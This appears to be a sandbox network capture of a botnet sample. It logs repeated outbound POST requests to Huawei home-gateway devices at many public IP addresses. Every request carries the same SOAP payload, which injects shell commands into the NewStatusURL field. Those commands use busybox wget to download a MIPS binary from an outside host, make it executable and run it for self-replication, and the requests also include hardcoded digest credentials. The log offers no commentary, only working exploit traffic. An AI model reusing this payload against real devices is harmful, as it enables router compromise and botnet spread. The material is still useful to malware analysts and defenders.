                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      33192.168.2.233734886.49.143.037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221313000 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      34192.168.2.2359124157.236.245.3537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221338034 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      35192.168.2.2347982197.32.17.11537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221338034 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      36192.168.2.233288841.210.186.22737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221364975 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      37192.168.2.235245041.214.240.13137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221366882 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      38192.168.2.234015041.226.72.20137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221482038 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      39192.168.2.2348608175.193.29.17237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221503973 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      40192.168.2.2352232197.155.27.25437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221503973 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      41192.168.2.2346632197.17.13.4637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221503973 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      42192.168.2.235770841.143.175.16437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221529961 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
